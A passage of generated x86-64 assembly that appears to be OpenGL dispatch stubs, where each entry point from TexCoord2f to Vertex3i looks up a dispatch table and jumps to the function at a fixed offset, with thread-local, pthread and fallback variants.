movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 832(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 832(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 832(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2f), .-GL_PREFIX(TexCoord2f)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2fv)
.type GL_PREFIX(TexCoord2fv), @function
GL_PREFIX(TexCoord2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 840(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 840(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 840(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 840(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2fv), .-GL_PREFIX(TexCoord2fv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2i)
.type GL_PREFIX(TexCoord2i), @function
GL_PREFIX(TexCoord2i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 848(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 848(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 848(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 848(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2i), .-GL_PREFIX(TexCoord2i)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2iv)
.type GL_PREFIX(TexCoord2iv), @function
GL_PREFIX(TexCoord2iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 856(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 856(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 856(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 856(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2iv), .-GL_PREFIX(TexCoord2iv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2s)
.type GL_PREFIX(TexCoord2s), @function
GL_PREFIX(TexCoord2s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 864(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 864(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 864(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 864(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2s), .-GL_PREFIX(TexCoord2s)
.p2align 4,,15
.globl GL_PREFIX(TexCoord2sv)
.type GL_PREFIX(TexCoord2sv), @function
GL_PREFIX(TexCoord2sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 872(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 872(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 872(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 872(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord2sv), .-GL_PREFIX(TexCoord2sv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3d)
.type GL_PREFIX(TexCoord3d), @function
GL_PREFIX(TexCoord3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 880(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 880(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 880(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 880(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3d), .-GL_PREFIX(TexCoord3d)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3dv)
.type GL_PREFIX(TexCoord3dv), @function
GL_PREFIX(TexCoord3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 888(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 888(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 888(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 888(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3dv), .-GL_PREFIX(TexCoord3dv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3f)
.type GL_PREFIX(TexCoord3f), @function
GL_PREFIX(TexCoord3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 896(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 896(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 896(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 896(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3f), .-GL_PREFIX(TexCoord3f)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3fv)
.type GL_PREFIX(TexCoord3fv), @function
GL_PREFIX(TexCoord3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 904(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 904(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 904(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 904(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3fv), .-GL_PREFIX(TexCoord3fv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3i)
.type GL_PREFIX(TexCoord3i), @function
GL_PREFIX(TexCoord3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 912(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 912(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 912(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 912(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3i), .-GL_PREFIX(TexCoord3i)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3iv)
.type GL_PREFIX(TexCoord3iv), @function
GL_PREFIX(TexCoord3iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 920(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 920(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 920(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 920(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3iv), .-GL_PREFIX(TexCoord3iv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3s)
.type GL_PREFIX(TexCoord3s), @function
GL_PREFIX(TexCoord3s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 928(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 928(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 928(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 928(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3s), .-GL_PREFIX(TexCoord3s)
.p2align 4,,15
.globl GL_PREFIX(TexCoord3sv)
.type GL_PREFIX(TexCoord3sv), @function
GL_PREFIX(TexCoord3sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 936(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 936(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 936(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 936(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord3sv), .-GL_PREFIX(TexCoord3sv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4d)
.type GL_PREFIX(TexCoord4d), @function
GL_PREFIX(TexCoord4d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 944(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 944(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 944(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 944(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4d), .-GL_PREFIX(TexCoord4d)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4dv)
.type GL_PREFIX(TexCoord4dv), @function
GL_PREFIX(TexCoord4dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 952(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 952(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 952(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 952(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4dv), .-GL_PREFIX(TexCoord4dv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4f)
.type GL_PREFIX(TexCoord4f), @function
GL_PREFIX(TexCoord4f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 960(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _x86_64_get_dispatch@PLT
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 960(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 960(%rax), %r11
jmp *%r11
1:
subq $40, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
movq %xmm3, 24(%rsp)
call _glapi_get_dispatch
movq 24(%rsp), %xmm3
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $40, %rsp
movq 960(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4f), .-GL_PREFIX(TexCoord4f)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4fv)
.type GL_PREFIX(TexCoord4fv), @function
GL_PREFIX(TexCoord4fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 968(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 968(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 968(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 968(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4fv), .-GL_PREFIX(TexCoord4fv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4i)
.type GL_PREFIX(TexCoord4i), @function
GL_PREFIX(TexCoord4i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 976(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 976(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 976(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 976(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4i), .-GL_PREFIX(TexCoord4i)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4iv)
.type GL_PREFIX(TexCoord4iv), @function
GL_PREFIX(TexCoord4iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 984(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 984(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 984(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 984(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4iv), .-GL_PREFIX(TexCoord4iv)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4s)
.type GL_PREFIX(TexCoord4s), @function
GL_PREFIX(TexCoord4s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 992(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 992(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 992(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 992(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4s), .-GL_PREFIX(TexCoord4s)
.p2align 4,,15
.globl GL_PREFIX(TexCoord4sv)
.type GL_PREFIX(TexCoord4sv), @function
GL_PREFIX(TexCoord4sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1000(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1000(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1000(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1000(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(TexCoord4sv), .-GL_PREFIX(TexCoord4sv)
.p2align 4,,15
.globl GL_PREFIX(Vertex2d)
.type GL_PREFIX(Vertex2d), @function
GL_PREFIX(Vertex2d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1008(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1008(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1008(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1008(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2d), .-GL_PREFIX(Vertex2d)
.p2align 4,,15
.globl GL_PREFIX(Vertex2dv)
.type GL_PREFIX(Vertex2dv), @function
GL_PREFIX(Vertex2dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1016(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1016(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1016(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1016(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2dv), .-GL_PREFIX(Vertex2dv)
.p2align 4,,15
.globl GL_PREFIX(Vertex2f)
.type GL_PREFIX(Vertex2f), @function
GL_PREFIX(Vertex2f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1024(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _x86_64_get_dispatch@PLT
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1024(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1024(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
call _glapi_get_dispatch
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1024(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2f), .-GL_PREFIX(Vertex2f)
.p2align 4,,15
.globl GL_PREFIX(Vertex2fv)
.type GL_PREFIX(Vertex2fv), @function
GL_PREFIX(Vertex2fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1032(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1032(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1032(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1032(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2fv), .-GL_PREFIX(Vertex2fv)
.p2align 4,,15
.globl GL_PREFIX(Vertex2i)
.type GL_PREFIX(Vertex2i), @function
GL_PREFIX(Vertex2i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1040(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1040(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1040(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1040(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2i), .-GL_PREFIX(Vertex2i)
.p2align 4,,15
.globl GL_PREFIX(Vertex2iv)
.type GL_PREFIX(Vertex2iv), @function
GL_PREFIX(Vertex2iv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1048(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1048(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1048(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1048(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2iv), .-GL_PREFIX(Vertex2iv)
.p2align 4,,15
.globl GL_PREFIX(Vertex2s)
.type GL_PREFIX(Vertex2s), @function
GL_PREFIX(Vertex2s):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1056(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 1056(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1056(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 1056(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2s), .-GL_PREFIX(Vertex2s)
.p2align 4,,15
.globl GL_PREFIX(Vertex2sv)
.type GL_PREFIX(Vertex2sv), @function
GL_PREFIX(Vertex2sv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1064(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1064(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1064(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1064(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex2sv), .-GL_PREFIX(Vertex2sv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3d)
.type GL_PREFIX(Vertex3d), @function
GL_PREFIX(Vertex3d):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1072(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1072(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1072(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1072(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3d), .-GL_PREFIX(Vertex3d)
.p2align 4,,15
.globl GL_PREFIX(Vertex3dv)
.type GL_PREFIX(Vertex3dv), @function
GL_PREFIX(Vertex3dv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1080(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1080(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1080(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1080(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3dv), .-GL_PREFIX(Vertex3dv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3f)
.type GL_PREFIX(Vertex3f), @function
GL_PREFIX(Vertex3f):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1088(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _x86_64_get_dispatch@PLT
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1088(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1088(%rax), %r11
jmp *%r11
1:
subq $24, %rsp
movq %xmm0, (%rsp)
movq %xmm1, 8(%rsp)
movq %xmm2, 16(%rsp)
call _glapi_get_dispatch
movq 16(%rsp), %xmm2
movq 8(%rsp), %xmm1
movq (%rsp), %xmm0
addq $24, %rsp
movq 1088(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3f), .-GL_PREFIX(Vertex3f)
.p2align 4,,15
.globl GL_PREFIX(Vertex3fv)
.type GL_PREFIX(Vertex3fv), @function
GL_PREFIX(Vertex3fv):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1096(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 1096(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1096(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 1096(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(Vertex3fv), .-GL_PREFIX(Vertex3fv)
.p2align 4,,15
.globl GL_PREFIX(Vertex3i)
.type GL_PREFIX(Vertex3i), @function
GL_PREFIX(Vertex3i):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 1104(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 1104(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 1104(%rax), %r11
